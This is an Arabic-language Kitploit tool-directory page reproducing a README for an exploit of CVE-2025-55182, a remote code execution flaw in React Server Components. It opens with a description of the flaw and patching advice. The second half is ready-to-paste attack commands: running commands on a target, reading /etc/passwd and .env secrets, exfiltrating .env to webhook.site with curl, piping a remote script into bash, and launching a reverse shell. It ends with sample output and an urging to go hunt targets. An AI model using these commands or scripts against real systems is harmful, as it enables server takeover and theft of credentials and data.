Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Blackash-CVE-2025-55182 — CVE-2025-55182 | Kitploit
أدوات/GitHubGitHub/shen771/blackash-cve-2025-55182
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالقيادة والسيطرةالتعلم والتعليمالفريق الأحمرأداة الوصول عن بعد
GitHubshen771/blackash-cve-2025-55182

Blackash-CVE-2025-55182

303منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

CVE-2025-55182

عرض المستودع
مشاركة

🚨 CVE-2025-55182 — ثغرة حرجة في خادم React

6930a0395ea4b5bfdd70430a_CVE-2025-55182

🧠 ما هي؟

  • ⚛️ ثغرة أمنية حرجة في React Server Components (RSC)
  • 🧨 ناتجة عن إلغاء تسلسل غير آمن
  • 🌐 قابلة للاستغلال عبر طلبات الشبكة
  • 🔓 لا تتطلب مصادقة
  • ☠️ يمكن أن تؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE)

✅ هذا يعني أن المهاجمين قد يتمكنون من تنفيذ تعليمات برمجية عشوائية على الخادم بطلب واحد مُعدّ بعناية.


📊 درجة الخطورة

  • 🔴 درجة CVSS: 10.0 (حرجة)
  • 🏴‍☠️ تعقيد الهجوم: منخفض
  • 🔑 الصلاحيات المطلوبة: لا شيء
  • 👤 تفاعل المستخدم: لا شيء
  • 💥 الأثر: إمكانية اختراق كامل للنظام

📦 التقنيات المتأثرة

⚠️ الأنظمة التي تستخدم React Server Components، بما في ذلك:

  • ✅ حزم React الخاصة بخادم DOM

  • ✅ أطر العمل التي تتضمن RSC، مثل:

    • Next.js (App Router + RSC)
    • إضافات RSC الخاصة بـ Vite
    • أدوات RSC الخاصة بـ Parcel
    • Redwood وWaku وغيرها

❌ غير المتأثرة:

تنزيل الأداة
  • تطبيقات React من جانب العميل فقط
  • التطبيقات التي لا تستخدم Server Components

  • 🔥 لماذا تشكّل خطرًا؟

    • 🧑‍💻 يمكن للمهاجمين تشغيل أوامر على خادمك
    • 🗃️ إمكانية سرقة قواعد البيانات والأسرار
    • 🦠 يمكن استخدامها لنشر برامج الفدية أو البوابات الخلفية
    • 🔄 قد تسمح بالتنقل الجانبي عبر البنية التحتية
    • 🚀 قابلة للاستغلال على نطاق واسع

    🛠️ ما الذي يجب فعله فورًا؟

    ✅ 1. التصحيح والترقية

    • ⬆️ حدّث React إلى الإصدارات المُصحّحة
    • ⬆️ حدّث Next.js أو أي إطار عمل يعتمد على RSC

    ✅ 2. مراجعة التبعيات

    • 🔍 افحص بحثًا عن الحزم الثانوية المعرّضة للخطر

    • 🧾 استخدم:

      • npm audit
      • pnpm audit
      • yarn audit

    ✅ 3. حماية مؤقتة (ليست حلاً كاملاً)

    • 🛡️ قواعد WAF
    • 🔐 مرشحات التحقق من الطلبات
    • 🚫 حظر الحمولات المشبوهة

    ⚠️ هذه الإجراءات تقلل المخاطر فقط — وهي لا تغني عن التصحيح


    👥 من يجب أن يشعر بالقلق؟

    • ✅ مطوّرو Full-stack الذين يستخدمون Next.js App Router

    • ✅ فرق DevOps التي تستضيف تطبيقات React SSR

    • ✅ مهندسو الأمان الذين يراقبون:

      • خدمات Node.js على الويب
      • بيئات تشغيل الحافة
      • تطبيقات Serverless SSR

    📌 الخلاصة الرئيسية

    🚨 إذا كان تطبيقك يستخدم React Server Components ولم يتم تصحيحه — فمن المحتمل أنه مخترق بالكامل الآن.


    🚨 إليك جميع الأوامر السريعة التي ستحتاجها (انسخ والصق → نتيجة فورية):

    CVE-2025-55182.py (استغلال RCE أساسي)

    root@kitploit:~
    # Basic info
    ./CVE-2025-55182.py https://target.com "id"
    ./CVE-2025-55182.py https://target.com "whoami"
    ./CVE-2025-55182.py https://target.com "uname -a"
    
    # Read files
    ./CVE-2025-55182.py https://target.com "cat /etc/passwd"
    ./CVE-2025-55182.py https://target.com "cat /app/.env"
    
    # Exfiltrate
    ./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/your-id -d @/app/.env"
    
    # Download & run (if wget/curl exists)
    ./CVE-2025-55182.py https://target.com "curl -s http://your-ip:8000/linpeas.sh | bash"
    

    CVE-2025-55182-revshell.py (صدفة عكسية فورية)

    root@kitploit:~
    # 1. Start listener (once)
    nc -lvnp 4444
    
    # 2. Fire → shell in <3 seconds
    ./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
    

    هذا كل شيء حرفيًا.
    سكربتان، وهذه الأوامر الثمانية → اختراق كامل لأي موقع Next.js غير مُصحّح اليوم.
    انطلق واجمع تلك المكافآت.

    إليك بالضبط ما ستراه في الوقت الفعلي عندما يعمل الاستغلال (هدف غير مُصحّح 100 %، 3 ديسمبر 2025):

    1. عندما تشغّل سكربت RCE العادي (CVE-2025-55182.py)
    ستكتب:

    root@kitploit:~
    ./CVE-2025-55182.py https://target.com "whoami"
    

    سترى فورًا على شاشتك:

    root@kitploit:~
    [+] CVE-2025-55182 Exploit
    [+] Target  : https://target.com
    [+] Command : whoami
    [+] Sending payload ...
    [+] Payload delivered successfully!
    [+] HTTP 200 – Command should have executed on the server
    [+] Server response:
    node
    

    → إن "node" (أو أي ناتج يعيده الأمر) هو الناتج الفعلي من الخادم الضحية.
    إذا شغّلت id سترى أسطر uid/gid الكاملة، إلخ.

    2. عندما تشغّل سكربت الصدفة العكسية (CVE-2025-55182-revshell.py)
    ستكتب:

    root@kitploit:~
    ./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
    

    سترى فورًا على طرفية الاستماع لديك:

    root@kitploit:~
    listening on [any] 4444 ...
    connect to [10.10.14.66] from (UNKNOWN) [172.17.8.45] 54321
    whoami
    node
    pwd
    /app
    ls -la
    total 1234
    drwxr-xr-x 1 node node  4096 Dec  3 12:34 .
    drwxr-xr-x 1 root root  4096 Nov 30 10:11 ..
    -rw-r--r-- 1 node node   420 Dec  3 11:11 .env
    ...
    

    → صدفة TTY تفاعلية كاملة بصلاحيات مستخدم node (وهو غالبًا مستخدم تطبيق الويب). أصبحت تملك النظام.

    هذا كل شيء حرفيًا.
    إذا رأيت أيًا مما سبق → فقد نجح الاستغلال 100 %.
    إذا حصلت فقط على HTTP 403/404 أو لا شيء → فقد تم التصحيح مسبقًا أو حجبه WAF.

    انطلق وابحث.


    إخلاء مسؤولية

    إثبات المفهوم هذا (PoC) مخصص لاختبارات الأمن المصرح بها والاستخدام التعليمي فقط.
    لا تشغّله ضد أي نظام لا تملكه أو ليس لديك إذن كتابي صريح لاختباره.
    الاستخدام غير المصرح به غير قانوني وقد يؤدي إلى ملاحقة جنائية.
    استخدمه فقط على مختبرك الخاص، أو برامج مكافآت الثغرات (bug-bounty) ذات النطاق الواضح، أو الأهداف التي منحتك الإذن.

    أنت مسؤول مسؤولية كاملة عن أفعالك.